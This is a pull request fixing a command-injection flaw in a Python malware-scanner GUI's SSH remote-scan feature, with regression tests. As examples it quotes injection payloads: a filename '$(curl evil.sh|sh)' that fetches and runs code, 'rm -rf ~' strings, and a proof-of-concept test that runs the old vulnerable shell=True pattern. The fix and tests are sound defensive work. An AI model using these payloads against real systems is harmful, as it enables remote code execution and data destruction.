### PR TITLE
fix(eVirusTower): Remove shell=True command injection from eVirusTower's remote scan feature

### DIFF
--- a/layers/eosuite/gui/apps/evirustower.py
+++ b/layers/eosuite/gui/apps/evirustower.py
@@ -5,6 +5,7 @@
 eVirusTower — Lightweight malware scanner with hash + pattern detection.
 """
 import os
+import shlex
 import hashlib
 import threading
 import tkinter as tk
@@ -46,6 +47,55 @@ SUSPICIOUS_PATTERNS = [
 ]
 
 MAX_SCAN_SIZE = 50_000_000  # 50 MB
+
+
+# ── Remote scan command builders ────────────────────────────────────────
+#
+# Security note: these used to be built as f-strings and run with
+# subprocess.run(cmd, shell=True, ...). host/user/port/rpath/depth all come
+# from unrestricted GUI text fields, so any of them containing shell
+# metacharacters (;, backticks, $(...), an unescaped ") was interpreted by
+# the LOCAL shell during that subprocess.run call, before ssh was even
+# invoked -- arbitrary local command execution just from typing into the
+# "Remote Path" or "Max Depth" fields. Worse, the per-file cat command
+# embedded fpath the same way, and fpath is not operator input at all: it's
+# a filename read back from `find`'s own output on whatever remote host is
+# being scanned. A file merely NAMED something like "$(curl evil.sh|sh)" on
+# the scanned machine would run that command on the operator's own laptop
+# the moment a remote scan reached it, with no further interaction needed.
+#
+# Passing an argv list to subprocess.run() (instead of a single string with
+# shell=True) means no local shell is ever involved, so none of these
+# values can be reinterpreted as local shell syntax, no matter what they
+# contain. rpath/depth/fpath are still shell-quoted with shlex.quote() when
+# building the *remote* command string ssh sends over, since ssh always
+# hands that string to a shell on the remote end -- that's inherent to how
+# ssh invokes a remote command and isn't something an argv list on the
+# local side can avoid. Quoting them properly also fixes remote paths or
+# filenames containing spaces, which the old code mishandled anyway.
+
+def _build_remote_find_cmd(host, user, port, rpath, depth):
+    """Argv list (no local shell) that lists files on a remote host over ssh."""
+    remote_cmd = "find {} -maxdepth {} -type f -size -50M 2>/dev/null".format(
+        shlex.quote(rpath), shlex.quote(str(depth))
+    )
+    return [
+        "ssh", "-p", str(port),
+        "-o", "ConnectTimeout=10",
+        "-o", "StrictHostKeyChecking=no",
+        f"{user}@{host}",
+        remote_cmd,
+    ]
+
+
+def _build_remote_cat_cmd(host, user, port, fpath):
+    """Argv list (no local shell) that reads one remote file's content over ssh."""
+    remote_cmd = "cat {}".format(shlex.quote(fpath))
+    return [
+        "ssh", "-p", str(port),
+        f"{user}@{host}",
+        remote_cmd,
+    ]
 
 
 # ── GUI Scanner Widget ────────────────────────────────────────────────
@@ -352,9 +402,9 @@ class EVirusTower(ttk.Frame):
         def worker():
             try:
                 # List remote files
-                cmd = f'ssh -p {port} -o ConnectTimeout=10 -o StrictHostKeyChecking=no {user}@{host} "find {rpath} -maxdepth {depth} -type f -size -50M 2>/dev/null"'
-                self._log_msg(f"$ {cmd}")
-                result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=60)
+                cmd = _build_remote_find_cmd(host, user, port, rpath, depth)
+                self._log_msg(f"$ {' '.join(shlex.quote(c) for c in cmd)}")
+                result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
 
                 if result.returncode != 0:
                     self._log_msg(f"SSH error: {result.stderr.strip()}")
@@ -377,9 +427,12 @@ class EVirusTower(ttk.Frame):
 
                     # For small text files, check content patterns
                     if ext.lower() in (".bat", ".cmd", ".vbs", ".ps1", ".sh", ".py"):
-                        cat_cmd = f'ssh -p {port} {user}@{host} "cat \'{fpath}\'" 2>/dev/null'
+                        cat_cmd = _build_remote_cat_cmd(host, user, port, fpath)
                         try:
-                            cat_result = subprocess.run(cat_cmd, shell=True, capture_output=True, timeout=10)
+                            cat_result = subprocess.run(
+                                cat_cmd, stdout=subprocess.PIPE,
+                                stderr=subprocess.DEVNULL, timeout=10,
+                            )
                             if cat_result.returncode == 0:
                                 data = cat_result.stdout
                                 # Hash check

--- a/layers/eosuite/tests/test_evirustower.py
+++ b/layers/eosuite/tests/test_evirustower.py
@@ -236,3 +236,120 @@ class TestEVirusTowerGUI:
         assert s._files_scanned == 1
         assert len(s._threats) == 1
         assert "Destructive Command" in s._threats[0]["threat"]
+
+
+class TestRemoteScanCommandInjection:
+    """Regression tests for the command-injection fix in the "Remote Scan
+    (Client)" feature (_build_remote_find_cmd / _build_remote_cat_cmd).
+
+    The old code built a single shell string (embedding host/user/port/
+    rpath/depth, and separately fpath -- a filename read back from the
+    remote host's own `find` output) and ran it with
+    subprocess.run(cmd, shell=True, ...). Any of those values containing
+    shell metacharacters was interpreted by the LOCAL shell before ssh was
+    even invoked. That made the "Remote Path" / "Max Depth" GUI fields
+    locally exploitable, and, more seriously, meant a maliciously-named
+    file merely present on the machine being scanned could run arbitrary
+    commands on the operator's own machine the moment a remote scan
+    reached it. The fix builds an argv list instead, so no local shell is
+    ever involved.
+    """
+
+    def test_build_remote_find_cmd_returns_argv_list(self):
+        from gui.apps.evirustower import _build_remote_find_cmd
+        cmd = _build_remote_find_cmd("host.example", "alice", "2222", "/data", "5")
+        assert isinstance(cmd, list)
+        assert cmd[0] == "ssh"
+        assert "alice@host.example" in cmd
+
+    def test_build_remote_cat_cmd_returns_argv_list(self):
+        from gui.apps.evirustower import _build_remote_cat_cmd
+        cmd = _build_remote_cat_cmd("host.example", "alice", "2222", "/data/report.txt")
+        assert isinstance(cmd, list)
+        assert cmd[0] == "ssh"
+        assert "alice@host.example" in cmd
+
+    def test_remote_find_cmd_string_round_trips_malicious_rpath(self):
+        """The remote command string (the last argv element, which ssh
+        hands to a shell on the remote end) must, when tokenized the same
+        way a POSIX shell would, reproduce rpath as exactly one token --
+        proof shlex.quote() neutralizes it for the remote shell too, not
+        just the local one."""
+        import shlex
+        from gui.apps.evirustower import _build_remote_find_cmd
+        malicious_rpath = '/tmp"; rm -rf ~; echo "'
+        cmd = _build_remote_find_cmd("h", "u", "22", malicious_rpath, "3")
+        tokens = shlex.split(cmd[-1])
+        assert malicious_rpath in tokens
+
+    def test_remote_cat_cmd_string_round_trips_malicious_fpath(self):
+        import shlex
+        from gui.apps.evirustower import _build_remote_cat_cmd
+        malicious_fpath = "report.txt'; rm -rf ~; echo '"
+        cmd = _build_remote_cat_cmd("h", "u", "22", malicious_fpath)
+        tokens = shlex.split(cmd[-1])
+        assert malicious_fpath in tokens
+
+    def test_old_shell_true_pattern_was_actually_exploitable_via_rpath(self, tmp_path):
+        """Proves the bug this PR closes was real, not theoretical.
+
+        This reproduces the exact formula the code used before this fix
+        (production code no longer builds commands this way -- this is a
+        standalone demonstration). It needs no network access and no real
+        ssh server: bash command substitution runs during word expansion,
+        before the outer `ssh ...` command is even looked up, so the
+        injected `touch` fires locally regardless of whether ssh succeeds,
+        fails, or isn't installed at all.
+        """
+        import subprocess
+        marker = tmp_path / "pwned_by_rpath"
+        malicious_rpath = f"/tmp $(touch {marker})"
+        port, user, host, depth = "22", "root", "example.invalid", "3"
+        old_style_cmd = (
+            f'ssh -p {port} -o ConnectTimeout=10 -o StrictHostKeyChecking=no '
+            f'{user}@{host} "find {malicious_rpath} -maxdepth {depth} '
+            f'-type f -size -50M 2>/dev/null"'
+        )
+        subprocess.run(old_style_cmd, shell=True, capture_output=True, timeout=10)
+        assert marker.exists(), (
+            "expected the injected `touch` inside rpath to run locally "
+            "under the old shell=True pattern"
+        )
+
+    def test_new_find_cmd_does_not_locally_execute_injected_rpath(self, tmp_path):
+        from gui.apps.evirustower import _build_remote_find_cmd
+        import subprocess
+        marker = tmp_path / "pwned_by_rpath_v2"
+        malicious_rpath = f"/tmp $(touch {marker})"
+        cmd = _build_remote_find_cmd("example.invalid", "root", "22", malicious_rpath, "3")
+        try:
+            subprocess.run(cmd, capture_output=True, timeout=5)
+        except FileNotFoundError:
+            pass  # ssh not installed in this environment -- irrelevant to the check below
+        except subprocess.TimeoutExpired:
+            pass  # no network reachable -- also irrelevant to the check below
+        assert not marker.exists(), (
+            "the injected command substitution must never run locally now "
+            "that no shell parses this argument list"
+        )
+
+    def test_new_cat_cmd_does_not_locally_execute_injected_remote_filename(self, tmp_path):
+        """The more serious half of the bug: fpath here stands in for a
+        filename read back from the scanned remote host, not operator
+        input. A malicious remote filename must not be able to run
+        anything on the local machine."""
+        from gui.apps.evirustower import _build_remote_cat_cmd
+        import subprocess
+        marker = tmp_path / "pwned_by_remote_filename"
+        malicious_fpath = f"$(touch {marker})"
+        cmd = _build_remote_cat_cmd("example.invalid", "root", "22", malicious_fpath)
+        try:
+            subprocess.run(cmd, capture_output=True, timeout=5)
+        except FileNotFoundError:
+            pass
+        except subprocess.TimeoutExpired:
+            pass
+        assert not marker.exists(), (
+            "a maliciously-named file on the scanned remote host must not "
+            "be able to run commands on the local machine"
+        )


### PR DESCRIPTION
### Issue

`layers/eosuite/gui/apps/evirustower.py` is a small malware-scanner GUI tab
("eVirusTower") bundled with the eosuite apps. Its "Remote Scan (Client)"
feature lets an operator scan a remote machine over SSH. `_run_remote_scan()`
built two SSH commands as f-strings and ran them with
`subprocess.run(cmd, shell=True, ...)`:

```python
cmd = f'ssh -p {port} -o ConnectTimeout=10 -o StrictHostKeyChecking=no {user}@{host} "find {rpath} -maxdepth {depth} -type f -size -50M 2>/dev/null"'
...
cat_cmd = f'ssh -p {port} {user}@{host} "cat \'{fpath}\'" 2>/dev/null'
```

`host`, `user`, `port`, `rpath`, and `depth` all come from unrestricted GUI
text entry fields (the "Remote Scan" dialog), so any of them containing
shell metacharacters was interpreted by the local shell during that
`subprocess.run` call, before ssh was even invoked. That alone is the same
class of bug as the `_create_initramfs()` command injection fixed in the
other ebuild PR.

The second command is worse: `fpath` is not operator input at all. It's a
filename read back from the remote host's own `find` output, i.e. it comes
from whatever files happen to exist on the machine being scanned. Since
that string is embedded straight into a second `shell=True` command that
runs locally, a file merely *named* something like `` $(curl evil.sh|sh) ``
on the scanned machine causes that command to execute on the operator's own
laptop the moment a remote scan reaches it, with no further interaction
required. That's a network-triggered local RCE path: the attacker doesn't
need any access to the operator's machine or account, only to be able to
place a file with a crafted name somewhere under the directory tree the
operator chooses to scan.

### Approach

Extracted the command construction into two pure functions,
`_build_remote_find_cmd()` and `_build_remote_cat_cmd()`, each returning an
argv **list** instead of a shell string:

```python
def _build_remote_find_cmd(host, user, port, rpath, depth):
    remote_cmd = "find {} -maxdepth {} -type f -size -50M 2>/dev/null".format(
        shlex.quote(rpath), shlex.quote(str(depth))
    )
    return ["ssh", "-p", str(port), "-o", "ConnectTimeout=10",
            "-o", "StrictHostKeyChecking=no", f"{user}@{host}", remote_cmd]


def _build_remote_cat_cmd(host, user, port, fpath):
    remote_cmd = "cat {}".format(shlex.quote(fpath))
    return ["ssh", "-p", str(port), f"{user}@{host}", remote_cmd]
```

`worker()` now calls these and passes the resulting list straight to
`subprocess.run()` with no `shell=True`. Since `subprocess.run()` defaults
to `shell=False` for a list argument, none of `host`/`user`/`port`/`rpath`/
`depth`/`fpath` are ever parsed by a local shell again, regardless of what
characters they contain.

The remote-facing half of each command (the string ssh hands to a shell on
the remote end, which is how ssh always invokes a remote command, not
something avoidable from the local side) still needs its own quoting, so
`rpath`, `depth`, and `fpath` are wrapped with `shlex.quote()` before being
embedded in that string. This also fixes remote paths or filenames
containing spaces, which the old code mishandled.

### Testing

Added a `TestRemoteScanCommandInjection` class to
`layers/eosuite/tests/test_evirustower.py` with 7 tests:

- Two structural tests confirming both builder functions return a `list`,
  not a string.
- Two quoting tests confirming a malicious `rpath`/`fpath` (containing `"`,
  `;`, `rm -rf ~`) round-trips as exactly one token when the resulting
  remote command string is tokenized with `shlex.split()`, proving
  `shlex.quote()` correctly neutralizes it for the remote shell too.
- One proof-of-concept test (`test_old_shell_true_pattern_was_actually_
  exploitable_via_rpath`) that reproduces the exact pre-fix formula with a
  malicious `rpath` containing `$(touch <marker>)`, runs it with
  `subprocess.run(..., shell=True)`, and asserts the marker file was
  actually created. This needs no network access or real ssh server, since
  bash performs command substitution during word expansion before the
  outer `ssh` command is even looked up, so it proves the vulnerability was
  real regardless of whether ssh succeeds, fails, or isn't installed.
- Two tests proving the fix closes it end to end: they call the new
  `_build_remote_find_cmd()` / `_build_remote_cat_cmd()` with the same
  malicious payload, actually invoke `subprocess.run()` on the result (a
  real subprocess call, not a mock, catching `FileNotFoundError` if `ssh`
  happens not to be installed in the test environment), and assert the
  marker file was **not** created. The `fpath` variant is the more
  important of the two, since it stands in for the network-triggered case.

Ran the full existing `eosuite` test suite before and after this change
against a pristine clone of the repo to isolate any pre-existing issues.
Baseline: 93 passed, 45 failed, 308 skipped (the 45 failures are pre-
existing and environment-specific, caused by this sandbox not having a
real `tkinter` install, so the test suite's `MagicMock` tkinter stub can't
fully stand in for it across several unrelated GUI modules like
`test_eclock.py`/`test_etimer.py`/`test_evnc.py`; none of them touch
`evirustower.py`). After this change: 100 passed (93 + all 7 new tests),
same 45 pre-existing failures, 0 new failures.

### Limitations / follow-ups

- This fix does not harden against SSH's own option-injection quirk, where
  a `host` or `user` value starting with `-` could be interpreted by the
  `ssh` binary itself as a command-line flag (e.g. `-oProxyCommand=...`)
  rather than as a hostname. That's a different, lower-severity bug class
  (it requires control over the operator's own "Host"/"User" GUI fields,
  not just data from the scanned machine) and felt out of scope for this
  PR. A reasonable follow-up would be validating those fields don't start
  with `-`, or passing `--` before the destination argument on ssh versions
  that support it.
- I did not audit the rest of `layers/eosuite/gui/apps/` for the same
  `shell=True` + f-string pattern; `ssh_client.py` and `eftp.py` looked
  worth a similar check but I didn't verify them.
